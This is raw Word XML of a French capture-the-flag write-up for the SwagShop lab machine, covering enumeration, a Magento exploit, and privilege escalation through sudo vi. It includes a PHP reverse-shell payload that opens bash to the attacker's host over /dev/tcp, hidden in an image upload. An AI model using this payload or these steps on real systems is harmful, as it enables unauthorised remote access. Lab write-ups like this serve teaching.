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A892A" w14:textId="77777777" w:rsidR="00005F0F" w:rsidRDefault="0027201B">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8CF650" w14:textId="77777777"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t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD21DAD" w14:textId="77777777" w:rsidR="0027201B" w:rsidRDefault="00A27E01">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SwagShop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> est une machine linux dont l’adresse IP est 10.10.10.140.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C93BAE" w14:textId="77777777" w:rsidR="00F369CD" w:rsidRDefault="00DD600F">
      <w:r>
        <w:t>Compétences mises en œuvre :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73036723" w14:textId="77777777" w:rsidR="00DD600F" w:rsidRDefault="00DD600F" w:rsidP="00DD600F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64989D54" w14:textId="77777777" w:rsidR="00DD600F" w:rsidRDefault="00DD600F" w:rsidP="00DD600F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enumération des fichiers et dossiers d’un site web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD883D8" w14:textId="77777777" w:rsidR="00DD600F" w:rsidRDefault="00742460" w:rsidP="00DD600F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Réécriture</w:t>
      </w:r>
      <w:r w:rsidR="00BA2746">
        <w:t xml:space="preserve"> d’un exploit</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0646D7A1" w14:textId="77777777" w:rsidR="00BA2746" w:rsidRDefault="00742460" w:rsidP="00DD600F">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Elévation</w:t>
      </w:r>
      <w:r w:rsidR="00175832">
        <w:t xml:space="preserve"> de privilège par un </w:t>
      </w:r>
      <w:r>
        <w:t>éditeur</w:t>
      </w:r>
      <w:r w:rsidR="00175832">
        <w:t xml:space="preserve"> de texte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAED04" w14:textId="77777777"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14:paraId="11F38EC5" w14:textId="724FF2CB"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lastRenderedPageBreak/>
        <w:t>Enumération</w:t>
      </w:r>
      <w:r w:rsidR="00983A90">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> initiale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8C6A6" w14:textId="5AFBF0B4" w:rsidR="0027201B" w:rsidRDefault="00A352B3">
      <w:r>
        <w:t xml:space="preserve">Comme toujours, nous utilisons nmap pour énumérer les ports et services de la machine distante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52B3" w14:paraId="388FE7E1" w14:textId="77777777" w:rsidTr="00A352B3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2485B57B" w14:textId="4D9BBBE2" w:rsidR="00A352B3" w:rsidRDefault="00A352B3">
            <w:r>
              <w:t>$ nmap -T4 -A 10.10.10.</w:t>
            </w:r>
            <w:r w:rsidR="006A0108">
              <w:t>140</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E4E1571" w14:textId="01DCBA60" w:rsidR="00A352B3" w:rsidRDefault="00A352B3"/>
    <w:p w14:paraId="0BE6A941" w14:textId="472DEAEB" w:rsidR="006A0108" w:rsidRDefault="006A0108">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479A117D" w14:textId="1052861C" w:rsidR="006A0108" w:rsidRDefault="00D80C2B">
      <w:r>
        <w:t xml:space="preserve">Deux ports sont ouverts, le port 22 pour un serveur ssh et le port 80 pour </w:t>
      </w:r>
      <w:r w:rsidR="00887A03">
        <w:t>un serveur web.</w:t>
      </w:r>
      <w:r w:rsidR="000B52E2">
        <w:t xml:space="preserve"> Nous allons énumérer ce dernier afin de trouver soit des répertoires soit des fichiers intéressants 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30014" w14:paraId="0B1B9E18" w14:textId="77777777" w:rsidTr="00C30014">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="396FA50C" w14:textId="653477EA" w:rsidR="00C30014" w:rsidRDefault="00C30014">
            <w:r>
              <w:t xml:space="preserve">$ dirsearch -w wordlist.txt -f -e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php</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>,txt,html</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>" -x 403</w:t>
            </w:r>
            <w:r w:rsidR="00DE1850">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="48EF8D0E" w14:textId="2903245C" w:rsidR="000B52E2" w:rsidRDefault="000B52E2"/>
    <w:p w14:paraId="7896A1D4" w14:textId="5BCFA850" w:rsidR="000B52E2" w:rsidRDefault="000B52E2">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C30014">
        <w:t>dirsearch</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4878FD52" w14:textId="6DA7CD2A" w:rsidR="00831766" w:rsidRDefault="0057707F">
      <w:r>
        <w:t>En attendant l’énumération des fichiers/dossiers</w:t>
      </w:r>
      <w:r w:rsidR="00196825">
        <w:t xml:space="preserve"> sur le site web, nous nous rendons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> sur le site et on se rend</w:t>
      </w:r>
      <w:r w:rsidR="00196825">
        <w:t xml:space="preserve"> compte qu’il y a une API Magento qui tourne.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665328A1" w14:textId="77777777" w:rsidR="00A352B3" w:rsidRDefault="00A352B3"/>
    <w:p w14:paraId="16A9B928" w14:textId="77777777"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14:paraId="0830E7C3" w14:textId="0B1097E3" w:rsidR="0027201B" w:rsidRPr="00FB2D95" w:rsidRDefault="00983A90" w:rsidP="00FB2D95">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Obtenir un accès utilisateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737C81B" w14:textId="216C7DB3" w:rsidR="0027201B" w:rsidRDefault="00345698">
      <w:r>
        <w:t xml:space="preserve">Une recherche sur searchsploit est </w:t>
      </w:r>
      <w:r w:rsidR="00CC7DC4">
        <w:t>intéressante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> car elle nous </w:t>
      </w:r>
      <w:r w:rsidR="00CC7DC4">
        <w:t>révèlera</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> plusieurs exploits disponibles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65615" w14:paraId="53D0347E" w14:textId="77777777" w:rsidTr="00465615">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15BECD21" w14:textId="35C5EAAA" w:rsidR="00465615" w:rsidRDefault="00465615">
            <w:r>
              <w:t>$ searchsploit Magento</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EADF22A" w14:textId="323018C4" w:rsidR="00465615" w:rsidRDefault="00465615"/>
    <w:p w14:paraId="7A32D311" w14:textId="33629660" w:rsidR="00465615" w:rsidRDefault="00465615">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682FBE75" w14:textId="1D961C91" w:rsidR="00376B30" w:rsidRDefault="00376B30">
      <w:r>
        <w:t xml:space="preserve">On récupère l’exploit </w:t>
      </w:r>
      <w:r w:rsidR="004364E2">
        <w:t>37977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E7E27" w14:paraId="18CB30C2" w14:textId="77777777" w:rsidTr="007E7E27">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DB70786" w14:textId="77777777" w:rsidR="007E7E27" w:rsidRDefault="007E7E27">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>locate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 37977.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AAB4D8E" w14:textId="0166DB11" w:rsidR="007E7E27" w:rsidRDefault="0057707F" w:rsidP="0057707F">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> /usr/share/exploitdb/exploits/xml/webapps/37977.py</w:t>
            </w:r>
            <w:r w:rsidR="007E7E27">
              <w:t xml:space="preserve"> ./37977</w:t>
            </w:r>
            <w:r w:rsidR="0062227B">
              <w:t>.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="41671151" w14:textId="0BA0D669" w:rsidR="004364E2" w:rsidRDefault="004364E2"/>
    <w:p w14:paraId="14992E6D" w14:textId="6B7963F2" w:rsidR="004364E2" w:rsidRDefault="00A13B11">
      <w:r>
        <w:t xml:space="preserve">Après avoir passé beaucoup de temps sur l’exploit à le </w:t>
      </w:r>
      <w:r w:rsidR="00C73C81">
        <w:t>réécrire</w:t>
      </w:r>
      <w:r>
        <w:t>, il finit par fonctionner :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFC23BE" w14:textId="0E4020F9" w:rsidR="00C73C81" w:rsidRDefault="00C73C81">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3DAE6C" w14:textId="1E0E8168" w:rsidR="001F6D88" w:rsidRDefault="002C79F1">
      <w:r>
        <w:t xml:space="preserve">L’exploit nous indique une page html avec un identifiant et un mot de passe : </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>forme:forme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00254014">
        <w:t xml:space="preserve"> pour nous connecter sur l’API</w:t>
      </w:r>
      <w:r w:rsidR="00CA7A21">
        <w:t xml:space="preserve"> en tant qu’Administrateur</w:t>
      </w:r>
      <w:r w:rsidR="00254014">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005F5402">
        <w:t xml:space="preserve"> Nous explorons donc l’interface et il y a une section </w:t>
      </w:r>
      <w:r w:rsidR="00200E38">
        <w:t xml:space="preserve">pour publier un profil, dans le profil nous pouvons mettre une image, nous allons </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00200E38">
        <w:t>upload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00200E38">
        <w:t xml:space="preserve"> une image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00200E38">
        <w:t>backdooré</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00200E38">
        <w:t xml:space="preserve"> pour avoir un shell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00E38" w14:paraId="433884FB" w14:textId="77777777" w:rsidTr="00200E38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="706A908E" w14:textId="61ECE063" w:rsidR="00200E38" w:rsidRDefault="00200E38">
            <w:r>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>echo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> –e </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>"&lt; ?</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>nexec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'/bin/bash –c \"bash –i &gt;&amp; /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>dev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tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>/10.10.14.37/4567 0&gt;&amp;1</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>\"') ;\n ?&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>"</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> &gt; rev.jpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D873B8A" w14:textId="77777777" w:rsidR="00200E38" w:rsidRDefault="00200E38"/>
    <w:p w14:paraId="12048A5B" w14:textId="77777777"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14:paraId="533C70AB" w14:textId="444A46F9" w:rsidR="0027201B" w:rsidRPr="00FB2D95" w:rsidRDefault="00FA71FA" w:rsidP="00FB2D9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Obtenir un accès Administrateur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BB1F05" w14:textId="198138EF" w:rsidR="0027201B" w:rsidRDefault="00152118">
      <w:r>
        <w:t xml:space="preserve">En faisant l’énumération de base, on se rend compte que nous pouvons exécuter l’éditeur de texte VI avec les droits </w:t>
      </w:r>
      <w:r w:rsidR="0095787E">
        <w:t>d’administrateur</w:t>
      </w:r>
      <w:r w:rsidR="00221CA4">
        <w:t xml:space="preserve">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7AE2" w14:paraId="27EAA17C" w14:textId="77777777" w:rsidTr="00F77AE2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359172B7" w14:textId="5681B6BD" w:rsidR="00F77AE2" w:rsidRDefault="00F77AE2"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-l</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A1E6EC" w14:textId="3600CB98" w:rsidR="0027201B" w:rsidRDefault="0027201B"/>
    <w:p w14:paraId="578F5D49" w14:textId="4E266B93" w:rsidR="00F77AE2" w:rsidRDefault="00F77AE2">
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F9C6E9" w14:textId="6239F0AE" w:rsidR="00F77AE2" w:rsidRDefault="00F77AE2">
      <w:r>
        <w:t xml:space="preserve">Nous allons donc sur le site </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GTFOBin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, pour voir les manipulations à effectuer pour obtenir un </w:t>
      </w:r>
      <w:r w:rsidR="00AB380A">
        <w:t>shell administrateur</w:t>
      </w:r>
      <w:r w:rsidR="00D651F1">
        <w:t xml:space="preserve"> et lire le flag root.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AB380A">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D32358" w14:textId="1D45EC4F" w:rsidR="00307968" w:rsidRDefault="00307968">
      <w:r w:rsidRPr="00307968">
        <w:t>https://gtfobins.github.io/gtfobins/vi/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5178" w14:paraId="22CFBB8A" w14:textId="77777777" w:rsidTr="00295178">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9212" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33AA2EBC" w14:textId="1EFBD0E3" w:rsidR="00295178" w:rsidRDefault="009E0B06">
            <w:r>
              <w:t>$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7D7B71F0" w14:textId="51AF2C7B" w:rsidR="00AB380A" w:rsidRDefault="00AB380A"/>
    <w:p w14:paraId="484A5276" w14:textId="3B24A4BB" w:rsidR="00295178" w:rsidRDefault="00295178">
      <w:r>
        <w:t>[vi]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3EC630" w14:textId="0546080B" w:rsidR="00F77AE2" w:rsidRDefault="00F77AE2"/>
    <w:p w14:paraId="6AAF3C73" w14:textId="77777777" w:rsidR="00F77AE2" w:rsidRDefault="00F77AE2"/>
    <w:sectPr w:rsidR="00F7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0EA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="971EC05E"/>
    <w:lvl w:ilvl="0" w:tplc="054EF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0C"/>
    <w:rsid w:val="00005F0F"/>
    <w:rsid w:val="000B52E2"/>
    <w:rsid w:val="00152118"/>
    <w:rsid w:val="00175832"/>
    <w:rsid w:val="00196825"/>
    <w:rsid w:val="001F6D88"/>
    <w:rsid w:val="00200E38"/>
    <w:rsid w:val="00221CA4"/>
    <w:rsid w:val="00254014"/>
    <w:rsid w:val="0026320C"/>
    <w:rsid w:val="0027201B"/>
    <w:rsid w:val="00295178"/>
    <w:rsid w:val="002C79F1"/>
    <w:rsid w:val="00307968"/>
    <w:rsid w:val="00345698"/>
    <w:rsid w:val="00376B30"/>
    <w:rsid w:val="003B7DA6"/>
    <w:rsid w:val="003E1D8D"/>
    <w:rsid w:val="004364E2"/>
    <w:rsid w:val="00465615"/>
    <w:rsid w:val="0053564C"/>
    <w:rsid w:val="0057707F"/>
    <w:rsid w:val="005F5402"/>
    <w:rsid w:val="0062227B"/>
    <w:rsid w:val="006A0108"/>
    <w:rsid w:val="006D55EF"/>
    <w:rsid w:val="00742460"/>
    <w:rsid w:val="00773094"/>
    <w:rsid w:val="007C300D"/>
    <w:rsid w:val="007E7E27"/>
    <w:rsid w:val="00831766"/>
    <w:rsid w:val="00887A03"/>
    <w:rsid w:val="0095787E"/>
    <w:rsid w:val="00983A90"/>
    <w:rsid w:val="009B5A28"/>
    <w:rsid w:val="009E0B06"/>
    <w:rsid w:val="00A13B11"/>
    <w:rsid w:val="00A27E01"/>
    <w:rsid w:val="00A352B3"/>
    <w:rsid w:val="00AB380A"/>
    <w:rsid w:val="00B43E0F"/>
    <w:rsid w:val="00BA2746"/>
    <w:rsid w:val="00C30014"/>
    <w:rsid w:val="00C73C81"/>
    <w:rsid w:val="00CA7A21"/>
    <w:rsid w:val="00CC7DC4"/>
    <w:rsid w:val="00D651F1"/>
    <w:rsid w:val="00D80C2B"/>
    <w:rsid w:val="00DC0153"/>
    <w:rsid w:val="00DD600F"/>
    <w:rsid w:val="00DE1850"/>
    <w:rsid w:val="00E63AC9"/>
    <w:rsid w:val="00F369CD"/>
    <w:rsid w:val="00F77AE2"/>
    <w:rsid w:val="00FA71FA"/>
    <w:rsid w:val="00F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7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00F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3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00F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3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55</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-04T17:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-07T18:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>